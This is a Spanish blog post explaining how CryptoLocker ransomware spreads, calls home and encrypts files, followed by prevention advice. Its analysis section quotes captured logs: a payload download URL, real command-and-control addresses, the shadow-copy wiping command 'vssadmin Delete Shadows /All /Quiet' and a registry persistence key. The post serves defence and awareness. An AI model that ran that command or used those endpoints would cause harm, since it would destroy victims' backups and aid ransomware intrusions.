viernes, 20 de noviembre de 2015

Cryptolocker una amenaza cotidiana

Recientemente los delitos informáticos, malware y robo de información o identidad han sido un trend topic en Internet en lo que ha sido este año 2015. El día de hoy me daré a la tarea de publicar de manera flexible a través de este portal el comportamiento común de un Blended Attack que ha infectado a miles de servidores, estaciones de trabajo y equipo personal al rededor del mundo y conocido como Cryptolocker.

¿Qué es un Cryptolocker?


 Un Cryptolocker es un pieza de código malintencionado que tiene el objetivo de cifrar los documentos alojados en un host, algunos de las extensiones que más ataca el malware de manera enunciativa más no limitativa son: .doc, .docx, .xls, .xlsx, .txt, .pdf, .ppt, .pptx, etc. Una vez cifrados los documentos el usuario recibe una alerta de notificación en la cual se advierte que su información ha sido "secuestrada" y para poder realizar la recuperación de su información deberá de pagar un "rescate" que va desde una tarifa inicial de 100 US/Eur hasta 500 US/Eur. El pago puede ser emitido a través de dinero electrónico mejor conocido como Bitcoins, transferencias bancarias o en persona.


El monto de la tarifa inicial de rescate aumenta conforme ha transcurrido el plazo de tiempo limite de pago estipulado por los atacantes para recuperar tu información. A continuación un ejemplo:

 

Este tipo de delito informático en el último trimestre del 2014 logro infectar a más de 650,000 víctimas al rededor del mundo, cifro 5.25 billones de archivos y obtuvo una remuneración de hasta 1.1 millones*. En el 2015 esta cifra será superada y por mucho.

¿ Cómo funciona?

 Existen varios métodos o aristas que los usuarios anómalos pueden utilizar para engañar al host o usuario y que estos a su vez instalen el malware. Algunos de los mecanismos más comunes implementados por los atacantes pueden ser:

  1. Cookie tracking (Mecanismo implementado para adquirir el comportamiento de navegación de un usuario usualmente instalado en las barras de búsqueda de los exploradores de Internet)
  2. Phishing (Envió de correos falsos)
  3. Trojanos (software que parece legitimo pero no lo es)
  4. Sitios ficticios o clonados.
 El usuario no percibe a simple vista la descarga o instalación del código malicioso ya que esté va explícitamente inscrito en el payload HTTP y se ejecuta en el background del ordenador a continuación un ejemplo claro de lo que ocurre:

Uac
Service
Background Intelligent Transfer Service



GET   /administrator/components/com_content/views/3010crypt.exe HTTP/1.1 Server   Apache/2
Cache-Control   no-cache Last-Modified   Thu, 19 Nov 2015 13:07:51 GMT
Connection   close ETag   "4d060e-22800-524e4723877c0"
Pragma   no-cache Accept-Ranges   bytes
User-Agent   Mozilla/4.0 Content-Length  141312
Host   mathmf.com Connection   close
HTTP   1.1 200 OK Content-Type   application/x-msdownload
Date   Thu, 19 Nov 2015 16:17:24 GMT


 Como todo buen malware el archivo binario se aloja y ejecuta en carpetas con permisos privilegiados como por ejemplo en el caso de windows es la carpeta Temp, una vez alojado en la carpeta privilegiada el archivo muta a una versión diferente para que los mecanismo de protección como los es un Antivirus les sea más difícil detectarlo.

El siguiente paso sería contactar a los servidores de Command and Control para enviar información relevante sobre el equipo tal como puede ser:

  1. El nombre de la máquina
    •  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName
  2. El tipo de sistema operativo y su versión
    •  \REGISTRY\USER\S-1-5-21-XXXXXXXXX\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
El servidor Command and Controll recibe la información, la procesa y envía comandos específicos al malware para comenzar a cifrar la información a continuación una muestra de los intentos de conexión hacia los equipos de comando y control:

TCP_MISS/200 GET http://kremasi.com/cgi-sys/suspendedpage.cgi? HIER_DIRECT/119.82.226.8
TCP_MISS/200 POST http://doormattx.com/CDography/images/1.php? HIER_DIRECT/205.134.238.142
TCP_MISS/200 POST http://familyiqblog.com/wp-content/themes/twentyeleven/3.php? HIER_DIRECT/199.101.183.130
TCP_MISS/200 POST http://gibaralawplus.com/1.php? HIER_DIRECT/104.18.45.110
TCP_MISS/200 POST http://id-protect.org/wp-admin/css/1.php? HIER_DIRECT/208.92.162.53
TCP_MISS/200 POST http://konutturk.net/1.php? HIER_DIRECT/5.250.245.39
TCP_MISS/200 POST http://mejdu.com/themes/default-bootstrap/3.php? HIER_DIRECT/217.174.156.20
TCP_MISS/200 POST http://normi-int.com/contact_form/1.php? HIER_DIRECT/103.11.75.15
TCP_MISS/200 POST http://shsbrawley.org/Pics/_notes/3.php? HIER_DIRECT/192.254.224.91
TCP_MISS/200 POST http://soznanie.net/1.php? HIER_DIRECT/192.187.108.171
TCP_MISS/200 POST http://thornhillmovers.net/back-up/cgi-bin/1.php? HIER_DIRECT/192.185.233.169
TCP_MISS/200 POST http://warnaaseliprinting.com/css/themes/2.php? HIER_DIRECT/182.253.224.219

En este punto el malware recibe la llave publica para comenzar el cifrado de los archivos así como también realizar tareas de: limpieza, robo de información, mutación para pasar de ser inapercibido entre otras tareas. Estas actividades pueden hacer imposible la recuperación de la información:

Comienzo de cifrado a través de API propietarias de windows***:

  API Name:  CryptAcquireContextW   Address:  0x00407036
  Params:  [NULL, NULL, 1, 4026531840]
  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\3010crypt.exe   DLL Name:  advapi32.dll

Borrado de información permanente del sistema***:

C:\WINDOWS\system32\vssadmin.exe
  Parentname:  C:\WINDOWS\explorer.exe
  Command Line:  vssadmin.exe Delete Shadows /All /Quiet
  MD5:  cdf76989d9fe20b7cc79c9c3f7ba2d4c
  SHA1: 3eb0e4bf445a5adc70394a4ba6fd5631c64396ca

Revisa y roba información sobre el historial de navegación del usuario***:

C:\Documents and Settings\admin\Local Settings\History\History.IE5\index.dat

Mutación y ejecución del malware al iniciar la computadora***:


C:\Users\Administrator\AppData\Roaming\b849c42\466fc57fa.exe  <-- Nuevo archivo
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Run\"b849c42" = C:\Users\Administrator\AppData\Roaming\b849c42\466fc57fa.exe  <-- Inico del código al prender el ordenador

¿Cómo podemos evitarlo?

 Matemáticamente es complicado realizar la recuperación de los archivos una vez cifrados ya que por lo regular el malware es programado para cifrar los archivos con algoritmos sofisticados y robustos como lo es RSA a 2048bits por lo que tardaríamos años en poder descifrar la clave. Pagar por el rescate de los datos tampoco es garantía de recuperación ya que como toda persona mal intencionada los atacantes no se conforman con poco así que es probable que exijan mayores pagos al poner se en contacto con el usuario afectado.

Recomendaciones de seguridad para minimizar un posible contagio. 

 Algunas medidas, controles y recomendaciones que podemos tomar en consideración para recuperar la información de acuerdo al NIST 800.83 y con base a mi experiencia obtenida durante los años que llevo en el campo de la seguridad informática son:

  1. Para el caso de compañías: 
    • Trabajar en un proceso de respuesta a incidentes que permita actuar ante una amenaza de malware y poder realizar su contención, remediación y principalmente la recuperación de información de los datos**.
    • Concientización de sus trabajadores sobre el uso adecuado de los activos que la compañía les provee.
  2. Para el caso de usuarios:
    • Realizar respaldos de su información en dispositivos externos como puede ser una USB o disco duro externo.
    • No abrir correos de destinatarios desconocidos y mucho menos si están en otro idioma ( "La curiosidad mato al gato" ).
    • No descargar programas de sitios desconocidos o sospechosos, realicen la descarga de sitios legítimos de los propietarios de las aplicaciones.
    • Utilicen controles de seguridad como un sistema de protección antimalware, mantener los actualizado y programado para ejecutar revisiones por lo menos dos veces a la semana (Antivirus)
    • Si llegan a tener un problema o incidente no traten de corregirlo por si mismos acudan a un centro de ayuda o con una persona especializada en la materia. ( sin ofender pero aveces los cafes internet son pequeños enjambres de virus por lo que tu equipo puede salir peor de lo que entro).

* Dato tomado de scmagazine.com
** Dato tomado de la publicación especial de NIST 800-83 Guide to Malware Incident Prevention and Handling
*** FireEye NX appliance



Publicadas por a la/s

No hay comentarios.:

Publicar un comentario

Suscribirse a: Comentarios de la entrada (Atom)